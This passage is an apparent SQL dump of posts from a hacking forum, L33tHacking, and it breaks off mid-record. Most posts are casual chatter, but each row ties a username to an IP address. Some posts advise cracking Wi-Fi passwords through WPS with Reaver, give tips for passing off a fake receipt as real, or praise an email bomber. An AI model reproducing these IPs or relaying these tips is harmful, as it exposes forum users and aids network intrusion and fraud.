'a0afaf793692db18039ec7326edf1a35', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5863', '1016', '5809', '7', 'RE: Flying Steps', '0', '62', 'R?????zo?', '1350819552', 'nice, looks awesome. wish i could do that haha', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '14a7d0263bb3538a2f397eb1524f4cd9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5864', '1013', '5741', '16', 'RE: The Official Magical Book of Free Food', '0', '62', 'R?????zo?', '1350819650', 'thanks for the feedback guys. :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '224cf6e7c2ebf5f3585f213ed0cdbbd1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5865', '1011', '5800', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350819709', '[quote=\'VirtualLegend\' pid=\'5800\' dateline=\'1350770727\'] Have you ever thought to make money designing graphics ? Cuz your pretty damn good at it [/quote] I\'ve worked as a webdesginer, is that good enough? :P', '94.132.244.168', '1585771688', '1', '0', '62', '1350928731', '1', 'e90782f815d614f80e2fcbf4643b6b8f', '0', '1350928731'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5866', '1016', '5809', '7', 'RE: Flying Steps', '0', '205', 'mothered', '1350821032', 'Cheers guys. Flying Steps have won many world championships, so they\'re definitely pros.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '9784418f2606df4b6ba2c24d4424ecba', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5867', '1019', '5836', '3', 'RE: Do you like your new?', '0', '205', 'mothered', '1350821130', 'I must say that I like them. They blend In very well Indeed. Good work.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'ca11242814687137caef4382711185de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5868', '1001', '5841', '7', 'RE: Shady URL', '0', '205', 'mothered', '1350821267', '[quote=\'PiXEL^OG\' pid=\'5841\' dateline=\'1350799870\'] lol i did not see that , Anyways good post [/quote] No problem at all. All good :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd56611e9da29853385659a5444d9c6a5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5869', '1026', '0', '3', '1000 THREADS !!!!', '0', '228', 'VirtualLegend', '1350821588', '[size=medium][align=center]L33tHacking Members we did it one thousand threads. All Thanks to the L33tHacking Members that made to the 1000 threads. Let\'s do our best and go for the 2000 threads. If that happens than I\'m gonna do a backflip (I can\'t do that) :P [img]http://i.imgur.com/hlAkt.png[/img] Peace OUT People[/align][/size]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'dbe738e17a6e9e4cd2b642e75b0d3915', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5870', '1019', '5836', '3', 'RE: Do you like your new?', '0', '228', 'VirtualLegend', '1350821803', 'This is gonna make me more active :P Thanks Joker', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2829a3492118e7462a949c366ba6f8f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5871', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '205', 'mothered', '1350821981', 'Your best option Is to use BackTrack. It has most of the required tools pre-Installed. If the AP Is vulnerable to WPS, you can use \"Reaver\" In BackTrack to crack the WPA PIN, hence reveal the password. The handshake methodology does fail at the best of times, so only use this when absolutely needed. Have a look at this: http://www.securitytube.net/video/2661', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7b1ac7cbd7e8cec6a0b7294774fd7744', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5872', '1023', '5844', '4', 'RE: New member here!!', '0', '228', 'VirtualLegend', '1350822054', 'Welcome sir I Hope that you stay active on LH And that you post HQ threads Have a nice stay :P', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '5d35fc706bbc3aeff84208744116f5a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5873', '1018', '5826', '47', 'RE: giving away premium account', '0', '228', 'VirtualLegend', '1350822679', 'I Don\'t need a Account, But It\'s really nice of you to give one of your accounts away ! Keep it Up Like this', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cdeb9aee151da07ea3308fbdd8631d90', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5874', '1017', '5822', '11', 'RE: Wifi hacking help :O', '0', '228', 'VirtualLegend', '1350822883', 'It\'s really easy to hack a WPA but a WPA2 is a little bit difficult.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'a5b084a116ba7d44905d7ca355d0c10b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5875', '688', '3508', '67', 'RE: [PHP] Email Bomber Source', '0', '228', 'VirtualLegend', '1350823480', 'Seems good, Gonna try it out Thanks for the share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '38771e67d91a18c17d15ad070d50f376', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5876', '1019', '5836', '3', 'RE: Do you like your new?', '0', '222', 'Exposé', '1350825612', 'Nice edition to the site joker :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '98cd41bfd61cb65bc0a1926d349260dd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5877', '1011', '5739', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '2', 'Apathy', '1350829262', '[quote=\'R?????zo?\' pid=\'5739\' dateline=\'1350748227\'] why you say that? if you would only see without the photoshop you wouldn\'t know if it was scanned or not. [/quote] If the paper is crinkled the letters should fallow suit. As I not be perfect when the paper is supposed to be crinkled up. You get what I mean?', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '1852e9784552d349aa6ef4ead9cfd408', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5878', '1008', '5702', '24', 'RE: Desktop or Lappy?', '0', '2', 'Apathy', '1350829695', 'I use a laptop for the most part because mine is sexy.', '173.206.138.180', '-1378973004', '0', '0', '0', '0', '1', '5878c7e33400dec7b3ffbf6a2eecd92f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5879', '1011', '5877', '44', 'RE: [TUT]How To Make A Realistic Fake Receipt [TUT]', '0', '62', 'R?????zo?', '1350831901', '[quote=\'Apathy\' pid=\'5877\' dateline=\'1350829262\'] [quote=\'R?????zo?\' pid=\'5739\' dateline=\'1350748227\'] why you say that? if you would only see without the photoshop you wouldn\'t know if it was scanned or not. [/quote] If the paper is crinkled the letters should fallow suit. As I not be perfect when the paper is supposed to be crinkled up. You get what I mean? [/quote] if you own a scanner you can just print it, and then crinckle up yourself and scan it , that\'s what I\'ve done before.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '0b546b9beb656a26daaf55af16d18ecc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5880', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '62', 'R?????zo?', '1350831952', 'Gratz everyone :) we are growing :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '6bc73a119b55f4ac9e1337129cfd9e87', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5881', '1019', '5836', '3', 'RE: Do you like your new?', '0', '62', 'R?????zo?', '1350832030', 'Looks like you forgot me :(', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '00da087eb522cea11a7b77e168f3dad1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5882', '1023', '5844', '4', 'RE: New member here!!', '0', '222', 'Exposé', '1350834549', 'Welcome bro again to LH lol and hopefully you can stay active :D', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'd4947253f482621e5ad039ddfbe4cbde', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5883', '1019', '5836', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350834711', 'You can give me that position to grant users awards. I don\'t mind. :) OT: Nice update :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b62e99ff20dcab548d3e3f0accdb707d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5884', '910', '5021', '49', 'RE: Referral Contest?', '0', '82', 'iTzIpod', '1350834757', '@t3h jok3r can you check out the thread? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '56c9543a8d73c767f59dd4f2b6f5ff54', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5885', '2', '4', '34', 'RE: Userbar tut', '0', '82', 'iTzIpod', '1350834819', 'Good luck on the group. Hopefully it\'ll be a good addition to LH', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '006d54198cc043c614a3a6b24769d198', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5886', '1020', '5840', '73', 'RE: How to make your ipod\'s battery 90 percent longer', '0', '222', 'Exposé', '1350834859', 'Maybe this will work on mah iphone :D. Thanks ill try it out', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', 'dace62cad7b2c1151bd46fef47a3b96c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5887', '1009', '5710', '74', 'RE: minecraft server setup tut', '0', '82', 'iTzIpod', '1350834860', 'Made a new Minecraft Server! :) Thanks again. Probably the most HQ post you made so far in my opinion. Others are just LQ or so.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b8465361b2dfe65f8026c023573f2112', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5888', '983', '5495', '47', 'RE: MC PREMIUM GIVE AWAY', '0', '82', 'iTzIpod', '1350834979', 'Do you want to close the thread now or something? And then make a new thread afterwards?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1295b77504afbb8705611a57d114c750', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5889', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350835014', 'Yeah I agree. But I don\'t know what to do or what to put :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '14377222bbdfabac17047c3bd806f3bd', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5890', '1015', '5791', '7', 'RE: Grounded', '0', '82', 'iTzIpod', '1350835190', 'Never get grounded. Just yelled and spanked at.. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7741f68da3adeaf29b651c97464b1619', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5891', '1015', '5791', '7', 'RE: Grounded', '0', '222', 'Exposé', '1350835289', 'Who the fuck get\'s spanked....(facepalm) And I can get 2000 paintball\'s for 30$ umad?', '74.76.76.132', '1246514308', '0', '0', '0', '0', '1', '8587e51431f061777549da4be3fa1c88', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5892', '1018', '5826', '47', 'RE: giving away premium account', '0', '82', 'iTzIpod', '1350835352', 'I should get this account because I was one of the first 100 members on this site. #82 And also, I have the most posts on LH and contributed A LOT to this forum. Most of my posts tend to be HQ and Grammar and Spelling Free. MOST. And also, I have referred about 10 or 15 members on this site. I am planning on referring more. I have probably the best Usergroup on LH. Or had... Unique!! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f582abf23c8021b6ee35fd2ce4f97051', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5893', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '82', 'iTzIpod', '1350835385', 'We are growing everyday :) Hopefully we become more successful than HF :3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e8717111b251a7b7329627f3ff781dc3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5894', '1023', '5844', '4', 'RE: New member here!!', '0', '82', 'iTzIpod', '1350835638', 'Welcome to LH bro :p Enjoy your stay :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f2e020bb58e8fef19f7e6836c4b6698b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5895', '1015', '5791', '7', 'RE: Grounded', '0', '82', 'iTzIpod', '1350835687', 'I get spanked. Lol I told you my age. -.- Asian Parents....', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4a635cf2a76da79d6977168d1b20d575', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5896', '1023', '5844', '4', 'RE: New member here!!', '0', '61', 'NXK', '1350836699', 'Welcome here, I hope you enjoy it. Try to stay HQ and active :)', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '0b1afbd736c962aac04d917266eddfae', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5897', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '3', '??????????¢™', '1350837091', 'We are growing very fast, Lets keep it up', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '8f1964896f0a56ab126280474d5a71ea', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5898', '944', '5284', '66', 'RE: What\'s your BF3 Method-ology?', '0', '61', 'NXK', '1350837129', 'Rush rush rush. Probably my favorite thing to do.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '4c00b8357797a043324989e65768003c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5899', '1015', '5791', '7', 'RE: Grounded', '0', '3', '??????????¢™', '1350837153', 'I dont get grounded anymore.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '1d96ed490dfc551007ed41561be22e89', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5900', '1023', '5844', '4', 'RE: New member here!!', '0', '3', '??????????¢™', '1350837296', 'Well welcome to LH, We hope you enjoy your stay here.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '7d4d44507fc9847324f0cc4ffc05bafb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5901', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '3', '??????????¢™', '1350837364', 'You could add another character in it on the other side and maybe a pet or something like a pokemon lol.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'fc507320bbcf54063b2f7dc91169e512', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5902', '1023', '5844', '4', 'RE: New member here!!', '0', '258', 'PiXEL^OG', '1350841549', 'Thanks for the warm welcome guys :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '62665c4e62784ee380ce9ac380774f84', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5903', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '258', 'PiXEL^OG', '1350841949', 'This community is growing fast!! :D I really hope we become a big and HQ forum with mostly tutorial threads because im sick of other forums where people just post bullshit all the time like HF May LH achieve greatness :)', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', '8441478ff489d76299f82e574383a828', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5904', '197', '696', '56', 'RE: /me Thread', '0', '3', '??????????¢™', '1350843353', '/me was the first admin that was on this forum and is the best!', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '937ba38726579c936d339f5e7d62897f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5905', '627', '3027', '33', 'RE: What can I do to improve this?', '0', '82', 'iTzIpod', '1350843495', 'ROFL a Pokemon.. Hm. Seems legit? :3 Would be quite funny. Might just make it Cloud Strife but transparent in the background. I can\'t explain it. :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e962559f894ae5328059e8e66875464d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5906', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350843537', '/me wishes to be a Mod/SMod/Admin :p Or, someone in power.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '007bf424ea31064264d186582cb8ea1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5907', '1015', '5791', '7', 'RE: Grounded', '0', '82', 'iTzIpod', '1350843604', 'You\'re lucky then iPownaholicTM Sorry if I spell your name wrong.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '11bda2d65bbd6eff6b84d7c4e0a465c8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5908', '197', '696', '56', 'RE: /me Thread', '0', '3', '??????????¢™', '1350843796', '/me wants t3h jok3r to get on skype ASAP.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '0b5d9c69d0af376c9a070b31aef46513', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5909', '1027', '0', '58', '[ Updated ] Marketers Group Request', '17', '228', 'VirtualLegend', '1350843854', '[align=justify][size=medium][b][u][color=#32CD32]Name Of the Group:[/color][/u][/b] The Marketers [u][b][color=#32CD32]Group Description:[/color][/b][/u] We are a High Quality group all about Money Making. We post threads about Money Making methods like PPD, PPC, CPA etc. And we are not gonna post only threads but we are here to help people too. [u][b][color=#32CD32]Group Userbar:[/color][/b][/u] [img]http://i.imgur.com/ifvO7.gif[/img] [u][b][color=#32CD32]Forum Name:[/color][/b][/u] The Marketers Palace [u][b][color=#32CD32]Forum Icon(34x34):[/color][/b][/u] [img]http://i.imgur.com/uP3eg.png[/img] [u][b][color=#32CD32]Why LH should make this group official:[/color][/b][/u] Because we don\'t have a group like this on LH. We will ensure that the Monetizing section is full of Money Making methods and tips. [/size][/align] [color=#FF0000][size=medium]I Hope that you will approve this group and that many People will join ![/size][/color]', '83.83.167.183', '1397991351', '1', '0', '228', '1350902474', '1', '41563d54fb8da44dc5fd45424a273826', '0', '1350902474'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5910', '197', '696', '56', 'RE: /me Thread', '0', '228', 'VirtualLegend', '1350844046', '/me is testing this out', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'ac2aab70b68880d6348cfbcdc68d65db', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5911', '1027', '5909', '58', 'RE: Marketers Group Request', '0', '61', 'NXK', '1350844595', 'I like the idea, But you\'re going to need to make a new userbar.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '9cd282fc9151923db2eee23affd732b2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('5912', '1019', '5883', '3', 'RE: Do you like your new?', '0', '1', 't3h jok3r', '1350845021', '[quote=\'iTzIpod\' pid=\'5883\' dateline=\'1350834711\'] You can give me that position to grant users awards. I don\'t mind. :) 